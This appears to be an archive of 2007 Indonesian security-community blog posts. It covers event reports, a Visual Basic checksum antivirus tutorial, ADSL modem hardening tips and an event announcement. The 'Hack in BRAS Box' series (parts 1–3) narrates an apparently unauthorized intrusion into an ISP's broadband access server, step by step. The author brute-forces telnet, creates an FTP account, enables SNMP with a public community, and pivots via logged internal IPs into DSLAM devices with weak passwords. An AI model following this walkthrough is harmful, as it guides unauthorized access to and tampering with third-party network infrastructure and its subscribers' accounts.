Pada tanggal 13-15 September 2007 telah diadakan acara Software Freedom Days 2007 yang diselenggarakan oleh KSL (Kelompok Studi Linux) Budi Luhur. Kebetulan echo menjadi salah satu pengisi acara. Ada 3 sesi yang diadakan pada hari ini (tgl 15 Sept), yaitu :

1. ksl-bl : All about FOSS (Free & Open Source Software) on Windows
2. ubuntu.or.id : FOSS on Education
3. echo : Firewall dan IDS dengan Linux, Honeypot, dan Security Testing (attacking bl.ac.id)

Acarana cukup rame, mengingat antusias para peserta sangat tinggi ttg dunia Open Source. Pada sesi pertama dibicarakan ttg FOSS di windows, apakah itu aplikasi multimedia seperti Audacity hingga aplikasi pengolah image, seperti GIMP.

Pada sesi kedua, perwakilan dari komunitas Ubuntu Indonesia (ubuntu-id.org) menyampaikan materi ttg dunia FOSS di Linux, khususna di distro Ubuntu. Sangat menarik apa yang disampaikan oleh kang Haary (maap kalo salah eja :P).

Nah setelah istirahat, dilanjutkan sesi untuk para pembicara dari Echo.or.id :). Oms Bherly menyampaikan ttg Firewall dan IDS dengan Linux, dimana membahas ttg IPTABLES dan Snort :). Dilanjutkan oleh oms Hero ttg Honeynet (lupa judul lengkapna :P). Duh materina oms Hero menarik bgt nih :), bagaimana kita bisa menjebak para intruder (penyerang/penyusup) dengan membuat server palsu :)

Sesi yang ditunggu2 oleh para peserta tidak lain adalah POC dari Audit situs bl.ac.id. Kebetulan ada oms Ammar dan oms Azis yang bertugas mendemokanna kepada peserta. Wiihhh.. kata oms hero n kawan2 staff echo yang mendapat tugas audit sih, 15 menit bisa tembus sang situs :) Memang tidak dijelaskan bagaimana cara mendapatkan akses root dari pertama. Hal ini tentu juga dipengaruhi oleh kode etik dan peraturan yg dibuat sebelumna. Jadi hanya dibuktikan bahwa terdapat kelemahan2 pada situs bl.ac.id yg perlu diperbaiki secepatna. Sempat diperlihatkan bagaimana sang "attacker" mendapatkan akses root pada MYSQL server :) wew, pokokna asik deh acarana.. mudah2an tahun depan tetap diadakan n tentuna semangat untuk menggunakan FOSS tidak padam bahkan terus tinggi... Amiinnn :)

Hack In BRAS Box - Part 3

2007-09-12T09:16:00.000+07:00

Bila pada bagian sebelumna kita sudah dapat mendowload/mengupload file ke BRAS Box, maka selanjutna aq pgn mengeksplorasi jaringan internal yang ada di Box tsb. Masih ingat dengan file Log (operationlogfile.log)? Dari 1 file tsb bisa mambantu kita dalam mengeksplorasi lebih lanjut. Misal dari file Log yg aq dapatkan :

%Sep 1 12:40:39 2007 BRAS-D2-XXX SHELL/5/LOGIN: VTY login from 203.xxx.xxx.xxx
%Sep 1 12:40:53 2007 BRAS-D2-xxx SHELL/5/CMD:task:vt0 ip:203.xxx.xxx.xxx user:** command:telnet 10.xxx.xxx.xxx
%Sep 1 12:42:35 2007 BRAS-D2-xxx SHELL/5/CMD:task:vt0 ip:203.xxx.xxx.xxx user:** command:ping 10.xxx.xxx.xxx

Dapat dilihat kalo sang "admin" (mungkin loh :P) sedang melakukan sesi telnet ke salah satu IP internal. Coba yuk kita juga melakukanna :

Wawwwww.... ternyata bisa... n juga username + passwordna masih sangat gampang ditebak :( ... Ada apa ajah sih command disini?

Wew.. gk sebanyak yg di BRAS Box... :) hehehehe... kalo dieksplorasi lebih jauh lagi, ternyata banyak DSLAM box (bener gk ya DSLAM?) yg bisa dimasukin, misal :

10.xxx.xxx.xxx
DSLAM01-D2-xxx_xxx

10.xxx.xxx.xxx
DSLAM01-D2-xxx_xxx

10.xxx.xxx.xxx
DSLAM01-D2-xxx_xxx

10.xxx.xxx.xxx
DSLAM01-D2-xxx

10.xxx.xxx.xxx
DSLAM01-D2-xxx

Dll.... moga2 sang ISP lebih baik lagi dalam hal manajemen keamanan infrastrukturna :) :)

Hack In BRAS Box - Part 2

2007-09-11T19:22:00.000+07:00

Kali ini aq akan mencoba konek ke FTP Server yang berjalan di BRAS target, dengan username + password yang valid tentuna. Pertama aq login terlebih dahulu ke BRAS target seperti gambar diatas. Lalu masuk mode system-view. Perlu diketahui, FTP Server harus dijalankan terlebih dahulu bila sebelumna masih dalam keadaan non-aktif dengan menggunakan perintah :

ftp server enable

Bila sudah aktif, maka selanjutnya kita akan membuat username + password baru agar valid di BRAS tsb :

Pembuatan User baru ada dibagian local-aaa-server, dan syntax tsb berarti kita menambahkan user dengan nama xxxxxxx@ftp (harus memakai domain, misal @yyyy), password berupa plaintext (simple) yaitu xxxxxxxx, mempunyai level 3 dan mempunyai direktori FTP di hd:/ :)

Setelah itu mari kita coba login ke FTP Server tsb :

Taraaaaaaaaaaaaaa.... :) disini kita bisa upload ato download file :).. Untuk referensi perintah FTP bisa liat di Google :)

Ohiya, jgn lupa, semua aktifitas kita di Box ini pasti dicatet ma log daemonna... File Log tsb biasana berada di folder /logfile/xxxxyy/operationlogfile.log, dimana xxxx adalah tahun, dan yy adalah bulan.. :) :)

Ultah Echo @ SMKN 26

2007-09-09T17:57:00.000+07:00

Hari ini Echo mengadakan acara ultah di SMKN 26 (dulu dikenal dengan nama STM Pembangunan) di Rawamangun. Peserta yang hadir jauh dari estimasi para panitia :( Tapi Alhamdulillah acara berjalan lancar dan tertib...

Pembicara yang hadir yaitu Oms Dedi Dwianto (the_day) dan oms Jim Geovedi, Oms Dedi kebagian sesi pertama membawakan materi tentang Protocol Tunneling, From Limit to Unlimit. Sayangna karena hambatan teknis demo tidak bisa dilakukan (walaupun koneksi internet dah diusahakan semampuna dengan Access Point darurat milik oms Hero :P). Sedangkan oms Jim membawakan materi tentang Enterprise Hacking (lupa judul lengkapna :P). Katana materi ini juga dibawakan pada acara HITB (hack In The Box) di Malaysia beberapa hari yg lalu :).. Oms Jim sempat memberikan Bonus Demo berupa penyusupan (cie nyusup2 bahasana :P) melalui protocol SSH ke sistem target (targetna terkemuka loh :P).. Thx oms Jim n oms Dedi atas materi yg sangat2 bermanfaat, semoga menjadi inspirasi dan motivasi bagi kita semua :)

Di acara tadi juga dijual berbagai merchandise spesial edition, special dimanana? pertama harga, pasti didiskon.. dan kedua tersedia Baju versi spesial ultah :).. Yang dijual tadi itu Buku Jasakom : Seri Hacking 1 dan 2, Wireless Kungfu, CD Hacking Backtrack 2.0 dan Buku oms Ammar : Hacker : it's not about black or white dan Pin Echo :) ...

Selain itu juga ada sesi diskusi panel yang isina tentang perkenalan staff2 echo, sejarah, visi-misi echo dan harapan echo di masa datang :).. Pada saat akhir acara diadakan Quiz yang hadiahna buku gratisan, :)

Semoga Echo menjadi komunitas yang besar, tidak hanya besar dalam jumlah memberna tapi "besar" dalam jiwa, berkarya, dan tidak henti2na memberikan kontribusi yang baik dan manfaat bagi bangsa (cieee :P)... Happy B'Day Echo... we always love U :)

How To Make Your Own (Portable) Anti Virus

2007-08-28T14:42:00.000+07:00

Portable itu apa sih? menurut aq ya, portable itu bisa dibawa n digunain dimana2.. Kalo aplikasi yg portable gimana?

"A portable application, or portable app for short, is a software program that does not require any kind of formal installation onto a computer's permanent storage device to be executed, and can be stored on a removable storage device such as a CD-ROM, USB flash drive, flash card, or even a floppy disk, enabling it to be used on multiple computers." sumber : wikipedia

Yups, berarti aplikasi tersebut bisa dijalankan tanpa harus diinstal terlebih dahulu di komputer yang menjalankanna... Lalu kalo Anti Virus dijadikan portable gimana? tentuna lebih efesien n manfaat, napa? soalna tidak perlu terinstall di komputer, jika sewaktu2 kita ingin menggunakanna di komputer lain bisa langsung dijalankan :) cucok buat yg suka nancepin Flashdisk ato HD External di komputer2 publik.

OK, apa aja yg diperluin untuk membuat suatu aplikasi yg portable? Berhubung karena tiap komputer itu beda spesifikasi hardware n software, maka perlu dicermati dalam pembuatan aplikasina juga. Misal, apakah di komputer yang akan dijalankan sudah tersedia file2 pendukung untuk aplikasi kita? Entah itu file DLL, OCX, atau lainna. Apakah spesifikasi hardwarena sama dengan komputer kita dimana development aplikasi dibuat? Untuk menghindari adana error atau tidak berjalanna aplikasi portable kita, lebih baik untuk memikirkan semua kemungkinan yg kira2 penting untuk berjalanna aplikasi kita nantina :)

Anti virus yang aq bikin menggunakan scanner statis dengan teknik checksum MD5. Disini aq sengaja gk pake rutin menghitung MD5 di dalam Anti Virus itu sendiri, melainkan memakai librari luar, yaitu aamd532.dll. untuk tampilan form menggunakan control Active-X Advanced Progress Bar, yaitu APB.ocx. Dan menggunakan control common dialog, yaitu comdlg32.ocx. Semua file librari external tersebut dijadikan sebah file Resource (RES) yg nanti akan dimasukkan kedalam aplikasi Anti Virus kita.

Secara garis besar, pada pertama kali run Anti Virus akan mengekstrak n menyalin file2 librari yg ada di "tubuhna" ke dalam direktori sistem dan menregister satu-persatu. Bisa diliat dari snippet kode berikut :

[code]
ekstrak GetSystemRoot & "\APB.OCX", 101
ekstrak GetSystemRoot & "\aamd532.dll", 102
ekstrak GetSystemRoot & "\comdlg32.OCX", 103
RegSvr32 GetSystemRoot & "\APB.OCX", False
RegSvr32 GetSystemRoot & "\aamd532.dll", False
RegSvr32 GetSystemRoot & "\comdlg32.OCX", False
[/code]
Rutin "ekstrak", "GetSystemRoot" dan "RegSvr32" dapat dilihat pada source code Anti Virus

Selanjutna, Anti Virus akan mengscan semua proses yg ada di memory terlebih dahulu. Hal ini dilakukan dengan :

[code]
Scanmem strDB, Form1.APB1, Form1.Label9, Form1.Label5, Form1.Label10, Form1.List1
[/code]
Objek label, APB dan listbox dapat dilihat pada source code Anti Virus

Setelah itu sang Anti Virus akan mengscan semua file yg ada di direktori dimana ia berada :

[code]
scanDir apPath
[/code]
Rutin "scanDir" dapat dilihat pada source code Anti Virus

Berhubung Anti Virus ini menggunakan scanner statis, maka diperlukan suatu database checksum MD5 yang berisi checksum dari file virus. Hal ini juga menjadi suatu kelemahan scanner statis :) File database yang digunakan bernama DB.DAT. Engine scanner statis ini dapat ditingkatkan kemampuanna sesuai dengan artikel sebelumna, "How To Make Your Own Anti Virus - Part 2".

Anti Virus ini dapat dijalankan secara otomatis pada flashdisk begitu flashdisk dimasukkan ke dalam komputer, dengan catatan autoplay pada komputer tersebut dinyalakan. Hal tsb dapat dilakukan dengan cara membuat file Autorun.inf pada root direktori flashdisk dan menambahkan kode berikut :

[code]
[Autorun]
open=nama_file_AV.exe
[/code]

Fitur yang dapat digunakan pada Anti Virus ini adalah pemeriksaan terhadap suatu file, pemeriksaan terhadap folder tertentu, pemeriksaan terhadap drive tertentu n penambahan checksum file yang dicurigai sebagai thread kedalam database checksum. Kecepatan penghitungan checksum MD5 terhadap suatu file pada Anti Virus ini dapat dikatakan cepat. Dengan catatan bahwa memory yang tersedia pada sistem komputer yang dijalankan memadai. Serta ukuranna yang relatif kecil, sehingga dapat dimasukkan kedalam disket :P Adapun kelemahan dari Anti Virus ini adalah penggunaan scanner statis yg kurang efesien n akurat. Untuk kelemahan2 lainna lom sempat ditemukan, dan diharapkan kelemahan2 yang akan ditemukan dapat diperbaiki serta ditingkatkan hingga optimal :)

Projek lengkap dapat diunduh di multikiller3-portable, Mirror

Source code APB.ocx, Mirror
Bila menemui dalam penggunaan file APB.ocx, harap source code APB.ocx di recompile terlebih dahulu

Saran n kritik terhadap aplikasi Anti Virus Portable sederhana ini sangat diharapkan :) :)

How To Make Your Own Anti Virus - Part 1

2007-08-28T14:11:00.000+07:00

Shoutz : All echo|staff, yogyafree|staff, The Killer Team
Myztx, vaganci, ^family_code^, TOMMY, adhietslank, ^rumput_kering^, Hartono, etc.
#e-c-h-o, #yogyafree, #javahack, #koncek, #canda, #canda-ops @DAL.NET
newbie_hacker@yahoogroups.com, yogyafree@yahoogroups.com
IT_CENTER@yahoogroups.com, ProgrammerVB@yahoogroups.com
virus_baru@yahoogroups.com
VBbego.com, Virology.info, Vbtn.com
IA01 dan 1IA07, Lab MaDas angk. 19/2004 @ Gunadarma University
Dan teman2 serta kerabat2 lain yang tidak bisa disebutkan satu-persatu

Notes : - Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
- Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
- Penggunaan nama, merek, atau logo hanya sebagai CONTOH dan REFERENSI saja, TIDAK ada maksud
mempromosikan pihak tertentu.
- Penulis mohon maaf apabila seluruh/sebagian dari isi artikel ini sudah tersirat dalam
artikel sejenis lainnya.

Main#
Sekarang kehadiran para virus maker (--selanjutnya disingkat jadi VM saja) lokal telah membuat gerah
para user komputer tanah air. Bisa dibayangkan bila dari sekian banyak virus lokal tidak satu-dua
yang menghancurkan data (terutama bagi file office; word, excel, dll...).
Bagi para vendor Anti Virus (--selanjutnya disingkat menjadi AV saja) fenomena ini adalah lahan bisnis
untuk produk mereka. Sebut saja NORMAN, yang kini men-support perusahaan konsultan virus lokal (--VAKSIN.COM)
, Symantec, McAffe, NOD32, dan sebagainya. Dengan menawarkan update definisi software AV tercepat, engine
scanner paling sensitif, dan lain-lain merupakan kiat untuk memancing para korban virus membeli
dan menggunakan software AV mereka.
Bagi penulis sendiri hal ini memang agak memberatkan mengingat update file definisi atau engine AV tsb
haruslah melalui koneksi internet. Lalu bagaimana yang tidak mempunyai akses sama sekali? Konsekuensinya iyalah
tertinggal dalam hal pengenalan varian virus baru yang pada ujung-ujungnya membuat AV yang sudah terinstall
bagai 'Macan Ompong'.
Kalau kita membuat AV sendiri bagaimana? dengan database definisi yang bisa diupdate oleh kita bahkan dapat
saling tukar dengan teman? Bisa saja, dengan syarat mau mempelajari sedikit teknik pemograman :D.
Pertama kita harus mengerti bagaimana cara kerja sebuah AV sederhana, pada dasarnya sebuah software AV mempunyai
komponen-komponen :

1. Engine scanner, ini merupakan komponen utama AV dalam mengenali sebuah pattern virus. Engine ini dapat
dikelompokkan menjadi statis dan dinamis. Statis dalam hal ini dapat disebut menjadi spesifik terhadap
pattern tertentu dari sebuah file virus. Checksum merupakan salah satu contoh dari engine statis ini.
Dinamis dalam artian dia mengenali perilaku 'umum' sebuah virus. Heuristic menjadi salah satu contohnya.
2. Database definition, menjadi sebuah referensi dari sebuah pattern file virus. Engine statis sangat bergantung
kepada komponen ini.
3. Decompress atau unpacking engine, khusus untuk pengecekan file-file yang terkompresi (*.rar, *.zip, dll) atau
kompresi atau packing untuk file PE seperti UPX, MeW , dll.

Tidak jarang hasil dari pengecekan terhadap file suspect virus menghasilkan false-positive bahkan false-negative
(-- false-positive berarti file yang bersih dianggap thread oleh AV, dan false-negative berarti file yang 100% thread
akan dianggap bersih). Semua itu dapat diakibatkan oleh ketidak-sempurnaan dari engine scanner itu sendiri. Misal
pada contoh kasus Engine String scanner (--Engine scanner yang menyeleksi string-string dari file text-based), bila
diterapkan rule 3 out of 5 (-- bila AV menemukan 3 dari daftar 5 string kategori malicious) maka AV akan memberikan
bahwa file terindikasi sebuah thread yang positif. Padahal file tsb nyatanya tidak menimbulkan efek berbahaya bila
dijalankan atau dieksekusi. Kesalahan scanning macam ini lazim ditemukan untuk file-file *.VBS, *.HTML, dll.
Untuk penggunaan engine checksum sangat banyak ditemui di beberapa software AV lokal. Checksum yang lazim digunakan
diantaranya CRC16, CRC32, MD5, dll. Dikarenakan mudah untuk diimplementasikan. Engine ini sendiri bukannya tanpa cacat,
Checksum bekerja dengan memproses byte demi byte dari sebuah file dengan sebuah algoritma tertenu (-- tergantung dari
jenis checksum yang digunakan) sehingga menghasilkan sebuah format tertentu dari file tsb. Contoh checksum menggunakan
CRC32 dan MD5 :

* calCrc = CRC32(file_name_and_path)
* calMD5 = MD5(file_name_and_path)

Maka isi dari string calCrc adalah 7AF9E376, sedangkan untuk MD5nya adalah 529CA8050A00180790CF88B63468826A. Perlu diketahui
bila virus menerapkan rutin yang mengubah byte tertentu dari badan virus tsb setiap kali maka penggunaan engine checksum ini
akan kurang optimal karena bila 1 byte berubah dari file maka checksum juga akan berubah.

Mari kita belajar membuat sebuah AV sederhana, yang diperlukan :

1. Software Visual Basic 6.0
2. Sedikit pemahaman akan pemograman Visual Basic 6.0
3. Sampel file bersih atau virus (-- opsional)

First#
Sekarang kita akan belajar membuat sebuah rutin sederhana untuk :
- Memilih file yang akan dicek
- Membuka file tersebut dalam mode binary
- Memproses byte demi byte untuk menghasilkan Checksum

Buka MS-Visual Basic 6.0 anda, lalu buatlah sebuah class module dan Form dengan menambahkan sebuah objek Textbox, CommonDialog dan Command Button.
(Objek CommonDialog dapat ditambahkan dengan memilih Project -> COmponent atau Ctrl-T dan memilih Microsoft Common Dialog Control 6.0)
Ketikkan kode berikut pada class module (kita beri nama class module tsb clsCrc) :

================= START HERE ====================

Private crcTable(0 To 255) As Long 'crc32

Public Function CRC32(ByRef bArrayIn() As Byte, ByVal lLen As Long, Optional ByVal lcrc As Long = 0) As Long

'bArrayIn adalah array byte dari file yang dibaca, lLen adalah ukuran atau size file

Dim lCurPos As Long 'Current position untuk iterasi proses array bArrayIn
Dim lTemp As Long 'variabel temp hasil perhitungan

If lLen = 0 Then Exit Function 'keluar fungsi apabila ukuran file = 0
lTemp = lcrc Xor &HFFFFFFFF

For lCurPos = 0 To lLen
lTemp = (((lTemp And &HFFFFFF00) \ &H100) And &HFFFFFF) Xor (crcTable((lTemp And 255) Xor bArrayIn(lCurPos)))
Next lCurPos

CRC32 = lTemp Xor &HFFFFFFFF

End Function

Private Function BuildTable() As Boolean
Dim i As Long, x As Long, crc As Long
Const Limit = &HEDB88320

For i = 0 To 255
crc = i
For x = 0 To 7
If crc And 1 Then
crc = (((crc And &HFFFFFFFE) \ 2) And &H7FFFFFFF) Xor Limit
Else
crc = ((crc And &HFFFFFFFE) \ 2) And &H7FFFFFFF
End If
Next x
crcTable(i) = crc
Next i
End Function

Private Sub Class_Initialize()
BuildTable
End Sub

================= END HERE ====================

Lalu ketikkan kode berikut dalam event Command1_Click :

================= START HERE ====================

Dim namaFileBuka As String, HasilCrc As String
Dim CCrc As New clsCrc 'bikin objek baru dari class ClsCrc
Dim calCrc As Long
Dim tmp() As Byte 'array buat file yang dibaca

Private Sub Command1_Click()
CommonDialog1.CancelError = True 'error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = "Baca File" 'Caption commondialog

On Error GoTo erorhandle 'label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileName
Open namafilbuka For Binary Access Read As #1 'buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1)) As Byte 'deklarasi ulang untuk array
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) 'mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) 'hitung CRC

HasilCrc = Hex(calCrc) 'diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric
Text1.Text = HasilCrc 'tampilkan hasilnya
Exit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description 'error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

COba anda jalankan program diatas dengan memencet tombol F5, lalu klik Command1 untuk memilih dan membuka file. Maka program akan
menampilkan CRC32nya.

Second#
Kode diatas dapat kita buat menjadi sebuah rutin pengecekan file suspect virus dengan antara membandingkan hasil
CRC32nya dan database CRC kita sendiri. Algoritmanya adalah :
- Memilih file yang akan dicek
- Membuka file tersebut dalam mode binary
- Memproses byte demi byte untuk menghasilkan Checksum
- Buka file database
- Ambil isi file baris demi baris
- Samakan Checksum hasil perhitungan dengan checksum dari file

Format file database dapat kita tentukan sendiri, misal :
- FluBurung.A=ABCDEFGH
- Diary.A=12345678
Dimana FluBurung.A adalah nama virus dan ABCDEFGH dalah Crc32nya. Jika kita mempunyai format file seperti diatas, maka kita perlu membaca
file secara sekuensial per baris serta memisahkan antara nama virus dan Crc32nya. Dalam hal ini yang menjadi pemisah adalah karakter '='.
Buat 1 module baru (-- diberi nama module1) lalu isi dengan kode :

================= START HERE ====================

Public namaVirus As String, CrcVirus As String 'deklarasi variabel global untuk nama dan CRC virus
Public pathExe as String 'deklarasi variabel penyimpan lokasi file EXE AV kita

Public Function cariDatabase(Crc As String, namaFileDB As String) As Boolean
Dim lineStr As String, tmp() As String 'variabel penampung untuk isi file
Open namaFileDB For Input As #1 'buka file dengan mode input
Do
Line Input #1, lineStr
tmp = Split(lineStr, "=") 'pisahkan isi file bedasarkan pemisah karakter '='
namaVirus = tmp(0) 'masukkan namavirus ke variabel dari array
CrcVirus = tmp(1) 'masukkan Crcvirus ke variabel dari array
If CrcVirus = Crc Then 'bila CRC perhitungan cocok/match dengan database
cariDatabase = True 'kembalikan nilai TRUE
Exit Do 'keluar dari perulangan
End If
Loop Until EOF(1)
Close #1
End Function

================= END HERE ====================

Lalu tambahkan 1 objek baru kedalam Form, yaitu Command button2. lalu ketikkan listing kode berikut kedalam event Command2_Click :

================= START HERE ====================
If Len(App.Path) <= 3 Then 'bila direktori kita adalah root direktori
pathEXE = App.Path
Else
pathEXE = App.Path & "\"
End If

CommonDialog1.CancelError = True 'error bila user mengklik cancel pada CommonDialog
CommonDialog1.DialogTitle = "Baca File" 'Caption commondialog

On Error GoTo erorhandle 'label error handle

CommonDialog1.ShowOpen
namafilbuka = CommonDialog1.FileName
Open namafilbuka For Binary Access Read As #1 'buka file yang dipilih dengan akses baca pada mode binary
ReDim tmp(LOF(1)) As Byte 'deklarasi ulang untuk array
Get #1, , tmp()
Close #1

calCrc = UBound(tmp) 'mengambil ukuran file dari array
calCrc = CCrc.CRC32(tmp, calCrc) 'hitung CRC

HasilCrc = Hex(calCrc) 'diubah ke format hexadesimal, karena hasil perhitungan dari class CRC masih berupa numeric
If cariDatabase(HasilCrc, pathEXE & "DB.txt") Then 'bila fungsi bernilai TRUE
MsgBox "Virus ditemukan : " & namaVirus 'tampilkan message Box
End If
Exit Sub

erorhandle:
If Err.Number <> 32755 Then MsgBox Err.Description 'error number 32755 dalah bila user mengklik tombol cancel pada saat memilih file

================= END HERE ====================

Fitur AV sederhana ini dapat ditambahkan dengan fitur process scanner, akses registry, real-time protection (RTP) dan lain lain. Untuk process
scanner pada dasarnya adalah teknik enumerasi seluruh proses yang sedang berjalan pada Sistem Operasi, lalu mencari letak atau lokasi file
dan melakukan proses scanning. Fitur akses registry memungkinkan kita untuk mengedit secara langsung registry windows apabila akses terhadap
registry (--Regedit) diblok oleh virus. Sedangkan fitur RTP memungkinkan AV kita berjalan secara simultan dengan windows explorer untuk mengscan
direktori atau file yang sedang kita browse atau lihat. Untuk ketiga fitur lanjutan ini akan dibahas pada artikel selanjutnya.

Kesimpulan#
Tidak harus membeli software AV yang mahal untuk menjaga komputer kita dari ancaman virus, kita bisa membuatnya sendiri dengan fitur-fitur yang
tak kalah bagusnya. Memang terdapat ketidaksempurnaan dalam AV buatan sendiri ini, tetapi setidaknya dapat dijadikan pencegah dari infeksi virus
komputer yang semakin merajalela. Software AV sederhana ini dilengkapi oleh engine scanner statis dan database definisi. Tidak tertutup kemungkinan
software AV ini ditingkatkan lebih advanced dalam hal engine scannernya.

Penutup#
Pengembangan software AV sederhana ini sepenuhnya Open-Source selama mengikutsertakan nama pembuat asli didalamnya. Listing serta projek lengkap dapat
didownload di Projek AV, Mirror

Acara Ulang tahun Echo.or.id

2007-08-27T12:55:00.001+07:00

Dalam rangka meningkatkan semangat berbagi dna belajar bersama maka di ulang tahunnya yang ke empat in Echo akan mengadakan beberapa kegiatan:

Nama : Ulang tahun Echo yang ke 4
Pelaksanaan
Tempat : Aula SMK N 26 Jakarta (ex. STM Pembangunan)
Jl. Balai Pustaka Baru I, Rawamangun, Jakarta Timur 13220
Tanggal : Minggu, 9 September 2007
Waktu : Pukul 09.00 - Selesai BBWI

Acara

Sesi Seminar dengan tema "Apakah Kamu dan Komputermu aman" ?
Speaker & Judul Materi :

* Jim Geovedi
materi : Latest Computer And Network Security Threats (0day)
(akan membahas info-info up-to-date tentang berbagai jenis ancaman dan serangan terhadap keamanan komputer dan jaringan saat ini)
* the_day (Dedi Dwianto)
materi: Protocol Tunneling : From Limited to Unlimited Acces
plus demo inet gratis dengan tunneling

Sesi Diskusi Panel:
* all Echo staff, moderator Jim Geovedi
materi : sejarah echo dan eksistensi echo

Sesi Pemotongan Tumpeng

Sesi Dikusi Bebas
Selama lebih kurang 45 menit, para peserta bisa bebas bertanya tentang semua hal di luar materi dan terkait dengan keamanan komputer dan jaringan.

Sesi launching Buku y3dips
Selama 15 menit, para peserta bisa mengetahui latar belakang pembuatan buku ini, serta diskon sebesar 20% untuk pembelian buku tersebut :)

Sesi hiburan
Akan di bagikan Door price berupa buku, kaos, pin dan merchandise lainnya

E.t.c
Di jual buku-buku keamanan (buku y3dips juga :P) yang bekerja sama dengan jasakom.com, kaos echoerz edisi khusus, PIN echo dsb

Kontribusi Peserta

Rp.45.000 untuk mahasiswa/pelajar
Rp.75.000 untuk umum

Fasilitas

- Makan Siang + Air Mineral
- untuk yang membawa hardisk external/usb bisa mengkopi materi plus dokumentasi lainnya.

Pendaftaran

- EMail Registration
Dengan format sebagai berikut :

============

To : ultah@echo.or.id
Subject : ultah echo REGISTRATION
BODY :

Ultah EcHo .

Full Name :
Nick :
Phone :
Email :

============

Apabila sudah Transfer silakan kirim email konfirmasi dengan format sebagai berikut

- Email Confirmation
Dengan format sebagai berikut :

============

To : ultah@echo.or.id
Subject : ultah echo CONFIRMATION
BODY :

Full Name :
No Rekening Asal :
No Rekening Tujuan :
Bank Mandiri Cabang RS. Harapan Kita
Rekening No : 116 000 4584 117
a/n Siska Kusumadewi
Jumlah Transfer :
Waktu Transfer :
============

- Transportasi & Peta Map+Transport Service

Regards;
echo|staff

Hack in BRAS Box

2007-08-26T20:56:00.000+07:00

BRAS, Broadband Remote Access Server bertugas untuk mengroute lalu lintas data dari/ke DSLAM (Digital Subscriber Line Access Multiplexer) di suatu ISP. Berbagai fitur ada di BRAS, seperti IP QoS, ototenkasi, PPPoA, n dll. Kali ini aq nyoba "masuk" ke box sebuah BRAS ISP terkemuka di Indonesia :P.

OK, lets get it ON!! Seperti biasa, kita akan gathering informasi seputar target. Aq nyoba ngescan port yang terbuka pake Angry IP Scanner. Port yg discan : 21,22,23,2222,2323,80,8080.

Si target membuka port telnet, berarti kita coba konek dengan telnet.exe. Uuppss, ada passwordna, n aq gk tau ni :(.. Untuk itu kita coba crack dengan Brutus...

Yupsss, kita dapet passwordna :) hehehe, dalam masalah crack password (palagi dengan teknik brute-force) memang diperlukan kesabaran extra, soalna makin panjang password (> 6 karakter) perlu waktu lama...
Coba kita login yuk ke BRAS tsb...

Taraaaaaaaaaaa... kita dah masuk ke box si BRAS... mo ngapain ya? Humm, coba kita liat user yg valid disini ...

Weks, banyak juga nih.. hehehehe... coba kita liat sapa ajah account yang konek ke BRAS ini...

Dalam posting sebelumna yg membahas soal hijacking account ADSL, kayakna lebih gampangan lewat BRAS ini dah.. hehehehe langsung ke pusatna :P
trus apa ajah yg ada di sini selain diatas? banyaaakkkk bgt, dari konfigurasi jaringan (bisa kita liat lewat SNMP) ampe konfigurasi BRAS tsb. Untuk SNMP sengaja aq aktifkan di BRAS tsb, n akses lewat public-community :)

Wah mang rawan nih kalo diapa2in si BRAS.. dari bikin backdoor ampe MITMA mungkin bisa dilakukan disini :P hehehhe, semoga para ISP lebih bisa mengamankan infrastruktur mereka tuk meminimalkan serangan seperti ini :) :)

Your ADSL Modem : How Secure Is It?

2007-08-26T01:41:00.000+07:00

Pernah ngalamin waktu konek ke internet dengan menggunakan koneksi ADSL, (lagi asik2 donlod :P) tiba2 putus koneksi? atau ingin konek ke internet tapi username n password anda ditolak? Humm, status modem OK, lampu ADSL nyala, lampu USB/Ethernet juga OK, Username n Password OK, kok gk mo konek!!!??? Nah lo! apa yang anda lakukan pertama kali? Angkat telpon n mulai mendial nomor telepon Customer Service ISP anda. Tetapi oleh sang "CS", diberitahu bahwa jaringan ADSL anda baik2 saja n sedang digunakan saat ini!??

Don't panic, mungkin anda termasuk salah satu (ato salah dua,tiga,empat, ... n) korban hijacking account ADSL. Kejadian ini bukanlah hal asing lagi, karena memang beberapa waktu lalu (atau bahkan saat ini masih) terjadi di berbagai kota. Aq gk tau angka pastina, tapi dengan tutorial atau pun eksperimen dewek, hampir semua orang bisa melakukanna.

"Gimana sih aq ko bisa kena?", sederhanana kita menggunakan modem untuk menghubungkan diri ke jaringan ADSL. Yups, modem ADSL (beberapa dah ada yg built-in router) mang banyak sekali jenisna. Dari china-manufactured ampe eropa-manufactured mungkin ada :P (bukan distibutor, jadi asal nyebut ajah :P). Pernahkah anda melihat-lihat atau mencoba fitur yang ada di modem ADSL anda? Salah satu fitur yang "wajib" ada di modem ADSL adalah Remote Management atau Web Management. Fitur ini memungkinkan kita mengakses modem secara remote/di luar jaringan lokal.

Nah itu dia permasalahanna, apakah fitur ini di modem anda sudah di non-aktifkan? bila belum, coba buka remote/web management dari browser anda. Masukkan IP/hostname modem anda (biasana sih IPna 192.168.1.1 atau 192.168.0.1, liat buku manual :P) lalu login dengan username n password yg ada di buku manual modem. Ubek2 si modem ampe nemu kata/kalimat "Enable/disable Remote/web management" atau sejenisna. Ya abis itu di non-aktifkan. Bila anda memang menggunakan fitur ini, ya tidak ada salahna untuk mengubah port default yg digunakan (biasana port 80 atau 8080). Jika tidak mengubah port ya ubahlah usernmae n password default modem anda :) :)

Aq ndiri juga pernah nemuin banyak modem ADSL yang masih bisa "terakses" dengan username n password defaultna. Apa yg bisa kita peroleh? dari username n password account ADSL hingga (mungkin) mengakses komputer yang ada di jaringan lokal mereka :)

Kalo account ADSL kita dah di tangan orang lain, wew bisa disalahgunakan (mungkin dipergunakan kata yg tepat :P). Tapi kayakna dengan adana hal semacam ini tentuna dari pihak ISP juga gk mau ketinggalan dunk, ya mereka bisa lebih "mengamankan" kustomer mereka. Misal dengan menerapkan sistem ototenkasi yang lebih ketat lagi :) :)

Struktur Program COM

2007-08-26T01:12:00.000+07:00

#####################################
